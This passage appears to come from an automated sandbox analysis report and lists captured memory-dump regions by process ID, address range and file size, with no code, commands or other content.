                                                                                                                                            • memory/4288-346-0x0000000000400000-0x0000000002B6D000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              39.4MB

                                                                                                                                            • memory/4288-349-0x0000000007140000-0x0000000007141000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4312-294-0x0000000004940000-0x0000000004941000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4312-288-0x0000000004B70000-0x0000000004B71000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4312-275-0x00000000000B0000-0x00000000000B1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4312-300-0x0000000004920000-0x0000000004938000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              96KB

                                                                                                                                            • memory/4312-271-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4312-309-0x0000000004A10000-0x0000000004A13000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              12KB

                                                                                                                                            • memory/4372-386-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4400-395-0x0000000005180000-0x0000000005786000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              6.0MB

                                                                                                                                            • memory/4400-372-0x000000000041C5E2-mapping.dmp
                                                                                                                                            • memory/4484-277-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4484-299-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              80KB

                                                                                                                                            • memory/4508-312-0x00000000077C0000-0x00000000077C1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4508-278-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4508-313-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4628-311-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4628-289-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4636-291-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4644-301-0x00000000000D0000-0x00000000000D1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4644-307-0x0000000004760000-0x000000000477B000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              108KB

                                                                                                                                            • memory/4644-318-0x00000000049D0000-0x00000000049D1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4644-290-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4692-335-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4752-336-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4752-359-0x000000001BA90000-0x000000001BA92000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              8KB

                                                                                                                                            • memory/4772-383-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4772-399-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4880-325-0x0000000005760000-0x0000000005D66000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              6.0MB

                                                                                                                                            • memory/4880-314-0x0000000000400000-0x0000000000401000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4880-305-0x0000000000400000-0x0000000000422000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              136KB

                                                                                                                                            • memory/4880-308-0x000000000041C5DE-mapping.dmp
                                                                                                                                            • memory/4960-310-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5116-347-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5116-375-0x00000000048D0000-0x0000000004DCE000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              5.0MB

                                                                                                                                            • memory/5156-603-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5248-599-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5316-571-0x000000000098D20B-mapping.dmp
                                                                                                                                            • memory/5400-548-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5608-473-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5864-505-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5952-516-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/6112-596-0x0000000000000000-mapping.dmp